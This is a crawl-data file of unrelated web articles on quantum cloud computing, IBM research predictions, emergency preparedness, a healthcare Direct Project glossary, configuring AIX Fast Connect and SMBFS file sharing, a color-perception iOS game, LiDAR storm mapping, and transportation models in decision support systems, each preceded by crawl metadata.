representatives said.
<urn:uuid:49b0b8bc-1de9-4c19-8aab-6185abf74c48>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Desktops-and-Notebooks/Intel-Remixes-Chip-Recipe-to-Cut-Power
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00127-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954053
327
2.921875
3
Quantum computing is still in its infancy, but soon anyone with a Web browser will have access to an early form of this powerful computing technology. At the British Science Festival, Professor Jeremy O'Brien from the University of Bristol announced a ground-breaking project called Qcloud that aims to give everyone access to quantum computing via the Internet. Quantum computing is based on units of information known as qubits. These qubits exist in multiple states at the same time, a phenomenon known as superposition. The nature of qubits means that answers can be computed simultaneously. It's an inherently parallel form of computing, and it's thought to be exponentially faster than conventional computing, which is based on binary states (zeros and ones). The first commercial quantum computer was pioneered by Canadian firm D-Wave Systems. Early adopters of D-Wave machines include Lockheed Martin, the University of Southern California, NASA and Google. There is an on-going discussion over whether D-Wave's technology should actually be considered quantum computing, but setting aside these arguments, the quantum systems that do exist have very limited access. Scientists at the University of Bristol were concerned that current quantum technology was limited to so few users. They believe that creating a healthy ecosystem requires making the tools accessible to more people. As of September 20, the quantum photonic processor housed at the Centre for Quantum Photonics at the University of Bristol will be available to researchers from anywhere in the world via remote access over the Internet. Not everyone will get the chance to manipulate the quantum machine, not at first anyway. Initially, members of the public will be able to access a quantum simulator. (User guides and manuals help explain the basics.) Once the novice quantum coders have developed a working simulation, they can submit a proposal requesting that it be run on the real McCoy. Project leader Professor Jeremy O'Brien said: "This technology has helped accelerate our research and is allowing us to do things we never thought possible. It's incredibly exciting to think what might be achieved by making this more widely accessible, not only to the brightest minds already working in research, but to the next generation. I hope that by helping schools to access this technology, and working with the British Science Association to provide educational content around quantum computing, we can achieve incredible things." The Qcloud computer is based on a silicon micro-chip, but instead of using electricity conducted on small wires it employs quantum states of light called photons. As the photons pass through the chip, they become entangled, meaning that actions performed on one affect the other. With processor fab techniques nearing the limits of nanoscale and the most common encryption techniques coming under attack, quantum computing holds enormous appeal to researchers and government entities. But don't expect too much from these early systems. The version being used online only has two qubits; it's no more powerful than a PC, noted project lead O'Brien. The University of Bristol researchers are working on 6- and 8-qubit versions; however, those systems are still in development. Interested in participating? The access point for the project is bristol.ac.uk/quantum-computing. The simulator is up and running now, and the actual quantum processors will be available for remote access starting Sept. 20.
A video of Jeremy O'Brien giving a TEDMED talk about the strange characteristics of quantum physics and their profound impact on several areas of health care.
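Superposition and entanglement can be illustrated with a few lines of linear algebra. The Python sketch below simulates two qubits with a plain state vector; it is purely illustrative and has nothing to do with Qcloud's actual interface, and it requires NumPy.

import numpy as np

H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)     # Hadamard gate: creates superposition
I = np.eye(2)
CNOT = np.array([[1, 0, 0, 0],
                 [0, 1, 0, 0],
                 [0, 0, 0, 1],
                 [0, 0, 1, 0]])                   # controlled-NOT: entangles two qubits

state = np.array([1, 0, 0, 0], dtype=complex)     # start in |00>
state = np.kron(H, I) @ state                     # put the first qubit into superposition
state = CNOT @ state                              # entangle the pair
print(np.round(np.abs(state) ** 2, 3))            # measurement probabilities: [0.5 0. 0. 0.5]

The output shows why entanglement is interesting: the pair is found as either 00 or 11, never 01 or 10, so measuring one qubit tells you about the other.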
<urn:uuid:fa7cd90a-fdcd-4319-9701-456d144d3709>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/09/10/quantum_computing_for_everyone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00523-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939847
716
3.859375
4
Great scientific leaps rarely happen incrementally. They come from setting big, ambitious goals that move discovery forward. Think of the Wright brothers’ determination to fly, President John F. Kennedy’s pledge to put a man on the moon, or IBM Research’s resolve to build a computer that could understand spoken language and beat the greatest human champions on Jeopardy! The bigger the goal, the greater the impact on society. This approach has been a hallmark of IBM Research since our founding more than 70 years ago, and it is responsible for many world-changing inventions. In that spirit, today we’re renewing our annual “5 in 5” predictions about five technologies that we believe have the potential to change the way people work, live, and interact during the next five years. IBM Research began the 5 in 5 conversation a decade ago as a way to stimulate interest and discussion around some of the most exciting breakthroughs coming out of our labs. Then, as now, this effort was informed by the breadth of IBM’s unmatched expertise across systems, software, services, semiconductors and a wide swath of industries. Forecasting is always a tricky business, but over the past ten years many of our 5 in 5 predictions have proven highly accurate in spotting and accelerating emerging technologies. For example: In 2012, IBM Research predicted that computers would not only be able to look at pictures, but understand them. The field of computer vision has advanced rapidly over the last several years, to the point where our scientists have designed systems with a computational form of sight that can examine images of skin lesions and help dermatologists identify cancerous states. That same year, we projected that computers will “hear” what matters. Significant advances are being made in creating cognitive systems that can interpret and analyze sounds to create a holistic picture of our surroundings. Very recently, in collaboration with Rice University, IBM announced a sensor platform that can “see”, “listen”, and “talk” and aids senior citizen for staying healthy, mobile, and independent. Also in 2012, we envisioned digital taste buds that could help people to eat smarter. IBM researchers turned to the culinary arts to see if Watson, the world’s first cognitive computing system, could help cooks discover and create original recipes with the help of flavor compound algorithms. They trained Watson with thousands of recipes and learning about food pairing theories. Two years later, Chef Watson debuted at SXSW, followed by a web application for home cooks. In 2013, our scientists anticipated that doctors will routinely use your DNA to keep you well. Full DNA sequencing is on its way to becoming a routine procedure. The following year, New York Genome Center and IBM started a collaboration to analyze genetic data with Watson to accelerate the race to personalized, life-saving treatment for brain cancer patients. In 2015, IBM announced another collaboration with more than a dozen leading cancer institutes to accelerate the ability of clinicians to identify and personalize treatment options for their patients. For this year’s 5 in 5, we’re struck by the powerful implications of the ongoing effort to make the invisible world visible, from the macroscopic level down to the nanoscale. Innovation in this area could enable us to dramatically improve farming, enhance energy efficiency, spot harmful pollution before it’s too late, and prevent premature cognitive decline. 
Our global team of scientists and researchers is steadily bringing this capacity from the realm of science fiction to the real world. You can read a detailed summary of the remarkable innovations we believe will result from this work over the next five years here. Below is a quick overview of our 5 in 5 predictions: With AI, our words will be a window into our mental health. In five years, what we say and write will be indicators of our mental health and physical wellbeing. Patterns in our speech and writing analyzed by cognitive systems will enable doctors and patients to predict and track early-stage developmental disorders, mental illness and degenerative neurological diseases more effectively. Hyperimaging and AI will give us superhero vision. In five years, our ability to “see” beyond visible light will reveal new insights to help us understand the world around us. This technology will be widely available throughout our daily lives, giving us the ability to perceive or see through objects and opaque environmental conditions anytime, anywhere. Macroscopes will help us understand Earth’s complexity in infinite detail. The physical world before our eyes only gives us a small view into what’s an infinitely interconnected and complex world. Instrumenting and collecting masses of data from every physical object, big and small, and bringing it together will reveal comprehensive solutions for our food, water and energy needs. Medical “labs on a chip” will serve as health detectives for tracing disease at the nanoscale. New techniques that detect tiny bioparticles found in bodily fluids will reveal clues that, when combined with data from the Internet of Things, will give a full picture of our health and diagnose diseases before we experience any symptoms. Smart sensors will detect environmental pollution at the speed of light. Environmental pollutants won’t be able to hide thanks to new sensing technologies that utilize silicon photonics to accurately pinpoint and monitor the quality of our environment. Together with physical analytics combined with artificial intelligence, these technologies will unlock insights to help us prevent pollution and fully harness the promise of cleaner fuels like natural gas. The combination of data explosion and exponential computation growth over the past fifty years has opened up whole new challenges for us to work on and solve together – challenges we never could have tackled or even foreseen in the past. This “digital disruption” is transforming the world around us. As our latest 5 in 5 predictions show, there is no challenge too big – or too small – for us to set our sights on if we’re only bold enough to take the chance. For more images, visit the IBM Research flickr page. Share this post:
<urn:uuid:eef3dd52-e58d-4fee-a199-5750af37a10e>
CC-MAIN-2017-04
https://www.ibm.com/blogs/think/2017/01/ibm-research-5-in-5-2017/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00339-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928005
1,233
2.84375
3
National Preparedness Month: Make Your Plan Today By Lauren Morowit, CHHS Research Assistant If an emergency happens in your community tomorrow – will you be ready? September is National Preparedness Month in the United States, and government agencies are urging all citizens to consider developing an emergency communication plan. The slogan for this readiness campaign is, “Don’t Wait. Communicate.” Emergencies can happen at any time – with or without any warning. However, individuals can exercise the choice to prepare practical responses before an emergency strikes in an attempt to lessen the perilous effects of a tragedy. The message being proliferated this month highlights the notion that the public can better prepare themselves and their families by taking appropriate measures which include to: 1) Be Informed, 2) Develop a Plan, 3) Build a Kit, and 4) Get Involved. Recently, our nation has been facing challenges posed by instances of flash floods, historic earthquakes, hurricanes, water main breaks, and the spread of the Zika virus. An official website of the Department of Homeland Security (DHS), Ready.gov, is providing site visitors with ample resources and tools in order to promote an understanding of how to prepare for these kinds of emergency situations. The website also offers various templates available for download for the purpose of crafting emergency communication plans for individuals and families. Here are a few easy steps to start your emergency communication plan: - Find out how to receive emergency alerts and warnings from public safety officials. - Discuss family/household plans for disasters that may affect your area. - Collect information for all relevant contacts including medical facilities and schools. - Identify information and pick an emergency meeting place that is safe and familiar. - Share information and ensure everyone involved knows the plan details including roles and responsibilities. - Practice your plan to ensure its feasibility. Additionally, the Red Cross provides information describing the proper supplies that should be included in basic emergency preparedness kits. The guidelines for assembling an emergency preparedness kit emphasize the need for storing amounts of food and water that would be sufficient to sustain a 3-day supply for evacuation and a 2-week supply for home. Moreover, it is important to consider any unique needs for family members which may require specific medical supplies and baby supplies. The level of coordination involving readiness and relief efforts largely demands that federal agencies cooperate with local organizations and corporations. Nonetheless, National Preparedness Month is a reminder that citizens from every community can help do their part to keep the nation safe by expecting the unexpected.
<urn:uuid:636e475d-0261-482d-b4da-ed0a73108487>
CC-MAIN-2017-04
http://www.mdchhs.com/national-preparedness-month-make-your-plan-today/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00247-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932826
522
3.390625
3
ARRA (American Recovery and Reinvestment Act): Also known as the "stimulus package of 2009," which includes HITECH. CA (Certificate Authority): A Certificate Authority issues digital certificates to organizations in order to ensure digital security on the Internet or other networks. Not all Certificate Authorities verify the validity and legality of organizations before issuing certificates like DigiCert does. CMS (Centers for Medicaid and Medicare Services): This group is a federal service organization that works to improve the health workforce, inform consumers, build collaborations, and make the healthcare system affordable while maintaining high value. Direct Address: It looks like an email and includes a health endpoint name (the location of a specific Direct user) and a health domain name (the location of a specific Direct HISP). DirectTrust: A non-profit alliance of healthcare industry participants formed to create a national Security and Trust Framework to better implement the Direct initiative. Direct Project- A federal initiative, spearheaded by the HHS and ONC, designed to facilitate the fast and secure transfer of health information. DirectTrust- A non-profit alliance of health care industry participants formed to create a national Security and Trust Framework to better implement the Direct initiative. DNS (Domain Name System): A system that assigns names to resources that connect to the Internet or networks. It facilitates rapid message transfer. DURSA (Data Use and Reciprocal Support Agreement): An agreement all organizations and agencies must enter into if they want to be involved in electronic health information exchange. These groups must abide by the standards set forth by the ONC. EHR (Electronic Health Record): A record of an individual or population which can include health information such as medical history, allergies, age, weight, billing address, etc. FBCA (Federal Bridge Certification Authority): The authority that sets the national standards for digital certificate transfer. HCO (Health Care Organization): An organization authorized by law to provide medical care and other health services for specific populations or coordinating bodies. HHS (Health and Human Services): The Department of Health and Human Services is the federal agency in charge of protecting and providing for the health of Americans. HISP (Health Information Service Provider): A for-profit corporation responsible for digitally delivering health information. HITECH (Health Information Technology for Economic and Clinical Health Act): A federal law that incentivizes medical providers to implement Health Information Technology. ISSO (Information Systems Security Officer): This individual ensures adequate protection of the Direct Cert Portal’s cryptographic keys. He or she also tracks and records who has access to the keys for their organization. Each HISP has at least one ISSO who ensures certificates are kept secure. MU (Meaningful Use): A program that encourages and incentivizes organizations to implement certified electronic health record technology. The goal of compliance is to improve clinical outcomes and general population health, increase transparency, and enable more robust research data. Objectives evolve in three stages: Stage 1 from 2011 to 2012, Stage 2 in 2014, and Stage 3 in 2016. 
ONC (Office of the National Coordinator for Health Information Technology): The main federal agency within the Department of Health and Human Services that promotes health information technology across the U.S. Representative: Within the Direct Cert Portal, the representative can prove ownership of the organization and authorize HISPs to get certificates in the organization's name.
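Because a Direct address is structured like an email address, with the health endpoint name before the @ and the health domain name after it, splitting it apart takes only a few lines. The Python sketch below is illustrative; the sample address is made up.

def parse_direct_address(address):
    # A Direct address pairs a health endpoint name with a health domain name, like an email address.
    endpoint, _, domain = address.partition("@")
    if not endpoint or not domain:
        raise ValueError("a Direct address needs both an endpoint and a health domain")
    return {"endpoint": endpoint, "health_domain": domain}

print(parse_direct_address("drsmith@direct.examplehealth.org"))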
<urn:uuid:c4e7c078-134d-478e-96fd-0d41c7c98756>
CC-MAIN-2017-04
https://www.digicert.com/direct-project/glossary.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00063-ip-10-171-10-70.ec2.internal.warc.gz
en
0.902436
692
2.65625
3
The Common Internet File System (CIFS), also known as Server Message Block (SMB), is a standard remote file system access protocol over the Internet, enabling groups of users to work together and share documents and printers across the Internet or within corporate intranets. CIFS allows multiple clients to access and update the same file, while preventing conflicts with sophisticated file sharing and locking semantics. It also permits aggressive caching and read-ahead and write-behind without loss of cache coherency, thereby increasing the performance, which is the backbone of today's sophisticated enterprise computer networks. CIFS complements HTTP and provides more sophisticated file sharing and file transfer than older protocols, such as FTP. File sharing between PC operating systems, such as Windows®, is commonly implemented using the CIFS protocol, and file sharing between AIX® systems has been implemented using the Network File System (NFS) protocol. Since these two protocols being non-interoperable, products like AIX Fast Connect and AIX SMBFS allow PC clients to access and share files on the AIX server and vice versa. Overview of AIX Fast Connect AIX Fast Connect is server software that allows AIX servers to share files and printers with personal computer clients running the following Windows operating systems: - Windows XP - Windows 2000 - Windows 2003 - Windows NT - Windows 98Windows AIX Fast Connect provides the following: - A rich set of security features - High performance (SendFile API support and memory-mapped files ) - File safety specifications (so that multiple machines can access the same file without locking problems and opportunistic locking) - Maintenance and administration using the System Management Interface Tool (SMIT) - Secure authentication techniques (AIX-based user authentication, NT pass-through authentication, Lightweight Directory Access Protocol (LDAP) support for user authentication, Kerberos-based authentication, and CIFS password encryption protocols) Figure 1. AIX Fast Connect Note: AIX Fast Connect supports AIX 5.1 and above. Install the following filesets to configure AIX Fast Connect: Figure 2. Configuring AIX Fast Connect Only the root user can perform the configuration of Fast Connect for the AIX server; however, any user can access the configuration menu. Starting the Fast Connect server There are two ways in which you can start the Fast Connect server: Figure 3. Using SMIT - Select the - In the next screen, the command completes and displays the following Server servername has started successfully on servername Using the command line net start /load. - To verify, run the following: #ps -eaf | grep cifs root 503820 1 0 Aug 23 - 0:00 /usr/sbin/cifsUserProc root 565300 1 0 Aug 23 - 0:12 /usr/sbin/cifsServer root 823380 757910 0 12:55:44 pts/2 0:00 grep cifs These two processes, associated with Fast Connect, are responsible for the SMB request and response: - cifsServer is the main server daemon; it is a main server process owned by root. - cifsUserProc is a client session daemon; there is one cifsUserProc for each session. For every new request to the AIX Fast Connect server from the Windows client, a new cifsUserProc thread is created. There are two ways in which you can add a new file system share: - Enter the following command: - Select Server Shares > File Systems (Shared Volumes) > Add File Systems (Shared Volumes). Figure 4. 
Adding file systems Using the command line - Enter the following command: #net share /add /type:f /netname:TEST /path:/home/divya /desc:"File share test" Configuration of encrypted passwords and defining a user When the AIX Fast Connect server is configured for encrypted passwords, AIX Fast Connect attempts to authenticate all incoming SMB usernames and encrypted_password logins against the AIX Fast Connect /etc/cifs/cifsPasswd file. This file, initialized and maintained by the net user command, is a database of AIX Fast Connect users (and their encrypted passwords). All AIX Fast Connect users defined by the net user command should be AIX users. The passwords of the Fast Connect users are distinct from (and might differ from) the standard AIX passwords in the /etc/security/passwd file. When an AIX user changes their password (using /usr/bin/passwd), the AIX Fast Connect password for that user does not automatically change. - To enforce encrypted passwords for AIX Fast Connect, type: #net config /encrypt_passwords:2 - To configure a new user for encrypted passwords, type: #net user username password /add #net user username -p /add -pflag prompts for a no-echo password. - To change a user's encrypted password and also update that user's AIX #net user username password /changeaixpwd:yes #net user username -p /changaixpwd:yes Once the above configurations are done, stop and start the server. - To stop the server and unload the server daemon, type: #net stop /unload - To load the server daemon and enable PC clients to connect, type: #net start /load Now the Fast Connect server is ready to allow PC clients to connect and access the exported file shares. Mapping drives from the PC clients Typically, PC clients must define drive mappings to use the CIFS exported file shares. These drive mappings can be done from Windows or from the DOS command prompt. You can use the following mechanisms to define or undefine mappings between PC drives and CIFS file shares. For the following examples, assume that the NetBIOS server name is indus19.in.ibm.com and that file shares test, test1, is defined. For DOS, enter the following: DOS> net help (help info for DOS) DOS>net use F: \\indus19.in.ibm.com\test /user:tstuser tstpass DOS>net use H: \\indus19.in.ibm.com\test1 (When username and password is not specified in the command line, then a pop window appear asking for the username and the password) DOS> copy F:\oldfile H:\newfile (uses the mapped drives) DOS> net use F: /delete (delete the mapped network drive) For Windows, do the following: - In the Map Network Drive dialog box, select Windows Explorer > Tools > Map Network Drive, or right-click Network Neighborhood and select Map Network Drive. - Select the drive from the Drive: drop-down list, and then Enter the path. For example, see Figure 5 below. Figure 5. Mapping drives - To access the exported CIFS filesystems from Windows(Y:\), see Figure 6 below: Figure 6. Accessing the exported CIFS filesystems from Windows Here are some other useful commands: - To query the server's operational status, type: - To show general configuration information, type: - To show statistical information (for example, packets delivered), You can reset the statistics counts by typing net statistics /reseton the command line. 
- To query the status of logged-in user sessions, type: - To list all shares currently exported by the CIFS server, type: - To list all users configured in the /etc/cifs/cifsPasswd file, type: - To delete a user from the encrypted passwords database, type: #net user username /delete Overview of SMBFS AIX SMBFS is the client software that allows AIX servers to mount shares and exports from the SMB server like Windows XP, Windows 2003, Windows 2000, Windows NT, or Windows 98 operating systems into the AIX Virtual File System (VFS). This eliminates the need to install the NFS servers on the PC clients and to enhance the file sharing between SMB servers and AIX through the VFS interface. Components that make SMBFS - The device driver for a pseudo device—This driver allows SMBFS to communicate with the SMB server in case it needs to initiate a reconnection or finish receiving a multi-packet response without the need to stop all threads that are performing file operations. - The file system interface—This interface supports VFS and vnode operations. - The SMB interface—This interface generates and retrieves SMB information. AIX SMBFS requires the installation of the following filesets: |bos.cifs_fs.rte||Run time for SMBFS| |bos.cifs_fs.smit||SMIT Interface for SMBFS| - On the server side, share the folder that has to be exported to AIX. Right-click on Select Sharing and Security > Share this Folder > Permissions tab > Check all the permissions - Full control, Change, and Read > Apply and OK. Figure 7. Sharing a foldertstcifs is the shared folder, and the share name is tstcifs. Figure 8. The shared folder - On the client side, execute the following to mount the shares of the - Enter the following to ensure that the nsmb0 device is in the available state. The device is a pseudo device that helps SMBFS to communicate with the SMB server #lsdev -l nsmb0 - If the device is not present, run /etc/mkcifs_fs, which creates the nsmb0 device and brings it to the available state. - Run the following to create a mount point and give the full permission to the mount #mkdir /mnt #chmod 777 /mnt - Run the mount #mount -v cifs -n (servername)/username/password /(sharename) /(mountpoint) Figure 9. The shared folder The main functionality of the mount command is: - To create a SMBIOD thread (It is the parent thread of SMBFS; It is a kernel thread that creates the session and manages the connection. It also helps in sending and receiving the requests and responses between the server and the client. Every mount performed on AIX has a corresponding smbiod thread.) - To establish the network (NETBIOS) connection between the server and the client - To create a TREE CONNECT (directory structure of Windows is put in the mount point of AIX box) - Enter the following to ensure that the nsmb0 device is in the available state. The device is a pseudo device that helps SMBFS to communicate with the SMB server (Windows): - AIX Fast Connect overview: Browse the AIX Fast Connect Version 3.2 Guide. - Overview of Server Message Block: Get the overview of Server Message Block here. - AIX and UNIX: The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of AIX systems administration and expanding your UNIX skills. - New to AIX and UNIX?: Visit the "New to AIX and UNIX" page to learn more about AIX and UNIX. - AIX Wiki: A collaborative environment for technical information related to AIX. 
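Administrators who repeat these steps often script them. The Python sketch below simply shells out to the same mount syntax documented above; the server, share, mount point, and credentials are placeholders, and the command must be run with appropriate privileges on an AIX client that has bos.cifs_fs installed.

import subprocess

def mount_cifs(server, share, mount_point, user, password):
    # Builds the documented command: mount -v cifs -n server/user/password /share /mountpoint
    cmd = ["mount", "-v", "cifs", "-n", f"{server}/{user}/{password}", f"/{share}", mount_point]
    return subprocess.run(cmd, check=True)

# Example (placeholders only):
# mount_cifs("winserver", "tstcifs", "/mnt", "tstuser", "tstpass")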
<urn:uuid:5cdd38a9-11ee-458f-8308-89cd3b07761a>
CC-MAIN-2017-04
http://www.ibm.com/developerworks/aix/library/au-fastconnect/index.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00549-ip-10-171-10-70.ec2.internal.warc.gz
en
0.816812
2,583
2.71875
3
Specimen is a deceptively simple, utterly frustrating iOS game that you will struggle to defeat. You will probably lose, and it’s all thanks to your terrible vision. The premise of the game is basic: Match friendly-looking little blobs in a petri dish to the color outside the petri dish. Only one specimen matches the exterior exactly. It seems so easy. But the blobs are all variations on the same color, and you’ll quickly realize that your perception is not quite as good as you thought it was. But that’s the point. Specimen creators Erica Gorochow, Sal Randazzo, and Charlie Whitney designed the app at the New Museum’s New Inc. art and technology incubator in Manhattan. The game is fun, to be sure, but it’s much more than just a silly time-waster. The end goal of Specimen is to figure out how age, gender, geographic location, and screens affect the way we see color. In its early days—Specimen launched in July—the team noticed that players were struggling with greens more than any other color. “It’s counter to something we had found in the research phase, that we should be able to see a much larger range of greens because of how our eyes evolved,” Gorochow said. “That makes me curious what screens can do. If we do find that there is this pattern among greens, I’d be curious to find out why that is.” The game might also have some unintended results, like helping people discover they’re colorblind, or the opposite—that they’re tetrachromats, or have four types of cone cells in the eye, and can see thousands of colors the rest of us can’t. Part of the inspiration for Specimen came from tetrachromacy. Gorochow heard an episode of Radiolab that focused on the condition and wanted to see if an app could detect the way you see color. She needed data, and lots of it. But people wouldn’t use the app if it was a research experiment, so Specimen was born: an experiment disguised as an addictive iPhone game. How to beat the game…or at least try Specimen levels are grouped in spectrums of difficulty. The game starts off easy—each blob is very different, and though you only have seconds to match them, it’s a breeze. Then the levels get harder, but then a little easier, oh but then much harder. “You always have some hope when you start a spectrum,” Gorochow, the game’s animation designer, said. If you’re doing well, the spectrum of colors of the blobs inside the petri dish will shrink. Soon, they’ll all look similar in color to each, though each blob is actually a different hue. As of now, only a handful of people have beaten the game. Early players developed hacks for conquering levels: Some recommended turning the brightness on your iPhone screen as high as it will go, while others pause and unpause the game “because they think that gives them an advantage,” programmer and designer Charlie Whitney said. Spoiler alert: It doesn’t. Playing with the lights off in your room or purposefully blurring your eyes can also help you match the specimen to the background. To keep you motivated, Whitney designed the blobs to have some personality. They don’t just sit static in the petri dish; they move around at random and seem as friendly as blobs possibly can. But eventually, when frustration finally wins out, you will want to kill those blobs with fire. That’s where the music comes in. Music to keep you moving Gorochow enlisted her friends Cody Uhler and Ross Wariner, composers and sound designers who created the soundtrack for Two Dots, to set the mood for Specimen. 
If you’re anything like me, you play games with the sound turned off. But Specimen’s music is a mood-booster, especially when you keep dying. “It’s quirky, oddly groovy,” Uhler said. “The grooviness paired with the visuals make me think of a lava lamp sometimes. I don’t know if that’s a good thing or a bad thing.” It’s a good thing. The blobs are jelly-like, and the sound associated with tapping them makes you feel like you’re popping bubble wrap. The Specimen team told Uhler and Wariner to think “organic, science-y, amorphous.” The resulting three pieces of synthesizer-made music loop together to create a vaguely psychedelic experience, which might sound strange until you start playing. “Because it’s such a brutal game, it was important that the music was something that would get you into a flow state,” Gorochow said. “It had to be something that pulled you in and helped you forget how much time had passed. I think they got it there.” The music inspires you to keep playing, and the more you play, the more anonymized data the Specimen team can use to figure out differences in color perception. Gorochow, Randazzo, and Whitney are envisioning what’s next for Specimen—possibly an Android version of the game, but also something much larger. Literally. Imagine a Specimen installation in an art museum, like the grand piano keys at FAO Schwarz, but instead of running across the ivories, you’re tapping blobs. Specimen is an anomaly in the App Store: a game rooted in art and science with a larger purpose than just raking in cash. That it proves both fun and challenging to play is a testament to its creators. This story, "Meet Specimen, an iOS game that proves you can't see color as well as you thought" was originally published by Macworld.
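The matching task at the heart of Specimen can be described as a nearest-color search. The Python sketch below uses a plain Euclidean distance in RGB space to pick the closest blob; the color values are arbitrary examples, and the game itself does not necessarily score matches this way.

def color_distance(c1, c2):
    # Euclidean distance in RGB space; smaller means more similar
    return sum((a - b) ** 2 for a, b in zip(c1, c2)) ** 0.5

target = (120, 200, 130)                                     # the color outside the petri dish
blobs = [(118, 202, 131), (125, 195, 128), (110, 210, 140)]  # candidate blobs inside the dish

best = min(blobs, key=lambda blob: color_distance(blob, target))
print("closest blob:", best)

Run on values this close together, the numbers make the game's difficulty obvious: the "wrong" blobs differ from the right one by only a few units per channel, well inside the range most eyes struggle to separate on a screen.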
<urn:uuid:260b2b66-e3b6-4c8c-8fe2-00b4d160ff46>
CC-MAIN-2017-04
http://www.itnews.com/article/2978143/ios-apps/meet-specimen-an-ios-game-that-proves-you-cant-see-color-as-well-as-you-thought.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282926.64/warc/CC-MAIN-20170116095122-00485-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955576
1,277
2.703125
3
How NYC Officials Are Using LiDAR to Prepare for Future Storms
With Sandy's passing, LiDAR has again become the talk of the geospatial community. New York City officials plan on using LiDAR technology to accurately measure the city's elevation. They'll do so by flying aircraft over the city and bouncing lasers off the surface to determine changes and areas that need immediate attention. The data will then be used to prepare for future hurricanes. This isn't the first time LiDAR has been used to assess geographical changes after a hurricane. Research teams used this data system after hurricanes Katrina, Rita, and Isabel to determine their impact on environmental factors such as erosion and water levels.
How does LiDAR work? LiDAR works like radar, except that instead of emitting radio waves to measure what bounces back, it uses thousands of light pulses. These light pulses provide 3-D information for an area and are useful for surface, vegetation, transportation-corridor, transmission-route, and 3-D building mapping. LiDAR's advantage over other geospatial tools is its ability to provide data over varied landscapes: when light pulses bounce off water, they bring back a weaker signal than when they bounce off terrain. The image above illustrates Hatteras Island before and after Hurricane Isabel. To really understand what LiDAR is and its uses, please click here to receive your free LiDAR for Dummies eBook. Image courtesy of nasa.gov
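The ranging arithmetic behind those pulses is simple: the sensor times each pulse's round trip and converts it to distance. A rough Python illustration follows; the return time used is just an example figure, not a value from the NYC survey.

SPEED_OF_LIGHT = 299_792_458.0          # metres per second

def one_way_distance(return_time_seconds):
    # The pulse travels out and back, so the one-way distance is c * t / 2.
    return SPEED_OF_LIGHT * return_time_seconds / 2.0

print(f"{one_way_distance(6.67e-6):.0f} m")   # a ~6.67 microsecond echo corresponds to roughly 1000 m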
<urn:uuid:ab84a59e-a85e-4434-b09e-b0854b6cfcae>
CC-MAIN-2017-04
http://blogs.dlt.com/nyc-officials-lidar-prepare-future-storms/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00304-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911682
313
3.6875
4
Why are transportation problems popular applications for DSS? In the early 1970s, many researchers were trying to apply mathematical programming to business problems. The transportation problem was often discussed as an application that would benefit from computerization. Why? I think it is because this type of problem can be formulated quantitatively and because such problems are often complex enough to benefit from using a model. Also, the allocation of transportation resources among competing uses is of interest to business decision-makers in a number of different industries. In general, real-world transportation problems are often important! We have seen many different software programs for solving transportation problems, but the basic need remains the same: managers want help in allocating a scarce resource. The basic problem formulation (cf. Hitchcock, 1941) has been adapted and expanded to a number of situations. A major application is scheduling airline routes. The following examples help explain why solving transportation problems is important to airlines. David Field discussed the issue in USAToday. Recently, Southwest Airlines implemented CALEB(TM) Technologies' CrewSolver DSS to reduce the cost from traffic control delays and mechanical and weather-related disruptions. So using Model-Driven DSS to solve transportation problems can improve profitability! On a cautionary note, Professor N. K. Kwak noted almost 30 years ago that "mathematical programming provides quantitative bases for management decisions -- bases with which management manipulates and controls various activities to achieve the optimal outcomes of business problems. Management can make better and more effective judgment by use of mathematical programming. However, it is no substitute for the decision maker's ultimate judgment." (p. 6)
And in response to a related question posted by Fred Njankou: What is a computer-aided routing system (CARS)?
References:
Davis, J. L. "United overhaul brings decision-making down to earth", InfoWorld.
Field, D. "Airlines pursue the trail of bucks", USAToday.
Hitchcock, F. L. "Distribution of a Product from Several Sources to Numerous Localities", The Journal of Mathematics and Physics, vol. 20, August 1941, pp. 224-230.
Kwak, N. K. Mathematical Programming with Business Applications.
The above is from Power, D., "Why are transportation problems popular applications for DSS?" DSS News, Vol. 2, No. 9.
Last update: 2005-08-07 11:37. Author: Daniel Power.
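To make the Hitchcock formulation concrete, here is a tiny example expressed as a linear program. The supplies, demands, and unit costs are invented for illustration, the sketch assumes SciPy is installed, and real airline crew or route models are of course far larger.

from scipy.optimize import linprog

# Unit shipping costs for 2 sources x 3 destinations, flattened row by row
costs = [8, 6, 10, 9, 12, 13]
A_eq = [
    [1, 1, 1, 0, 0, 0],   # source 1 ships exactly its supply
    [0, 0, 0, 1, 1, 1],   # source 2 ships exactly its supply
    [1, 0, 0, 1, 0, 0],   # destination 1 receives exactly its demand
    [0, 1, 0, 0, 1, 0],   # destination 2
    [0, 0, 1, 0, 0, 1],   # destination 3
]
b_eq = [20, 30, 10, 25, 15]   # balanced: total supply equals total demand (50)

result = linprog(costs, A_eq=A_eq, b_eq=b_eq)   # shipment quantities default to >= 0
print(result.x.reshape(2, 3))
print("total cost:", result.fun)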
<urn:uuid:babfb3cf-d00b-427f-9acd-4af5a0750529>
CC-MAIN-2017-04
http://dssresources.com/faq/index.php?action=artikel&id=74
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00120-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934178
526
2.5625
3
